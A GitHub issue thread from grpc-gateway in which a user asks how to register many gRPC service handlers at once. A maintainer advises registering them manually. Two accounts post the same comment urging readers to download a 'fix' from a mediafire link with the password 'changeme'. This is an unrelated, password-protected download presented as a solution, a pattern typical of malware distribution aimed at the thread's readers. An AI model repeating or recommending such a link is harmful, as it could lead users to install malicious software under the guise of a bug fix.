### ISSUE TITLE
How can register multiple gRPC services in `main.go` at the same time?

### ISSUE THREAD

**Issue by LaurentGK** [grpc-ecosystem/grpc-gateway#4664]
## 📚 Documentation

Below is my sample code. I have already understood the operation process of grpc-gateway and have successfully converted HTTP requests into gRPC requests.

```
import (
    Service01ProtoPb "com-grpc-gateway/proto/service01-proto"
    Service02ProtoPb "com-grpc-gateway/proto/service02-proto"
)

err = Service01ProtoPb .Register{01-001}ServiceHandlerFromEndpoint(ctx, mux, address, opts)
err = Service01ProtoPb .Register{01-002}ServiceHandlerFromEndpoint(ctx, mux, address, opts)
err = Service01ProtoPb .Register{01-003}ServiceHandlerFromEndpoint(ctx, mux, address, opts)

err = Service02ProtoPb .Register{02-001}ServiceHandlerFromEndpoint(ctx, mux, address, opts)
err = Service02ProtoPb .Register{02-002}ServiceHandlerFromEndpoint(ctx, mux, address, opts)
err = Service02ProtoPb .Register{02-003}ServiceHandlerFromEndpoint(ctx, mux, address, opts)
```

However, I have encountered the following problem:
Suppose I have 5 proto files, and after compiling each file, there are 10 gRPC interfaces.

According to the explanation in the guide document, I need to manually write code to register each one individually.

Is there any way to register multiple services at once based on the imported packages?

If there is no way, should I customize a mapper to achieve the functionality I want?

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by johanbrandhorst** [comment]
I would recommend just manually registering them. It's not generally something you need to do dynamically, since protobuf files are generated before your Go code is compiled. Even if you have hundreds of downstream services it's not that hard to write the code for it.
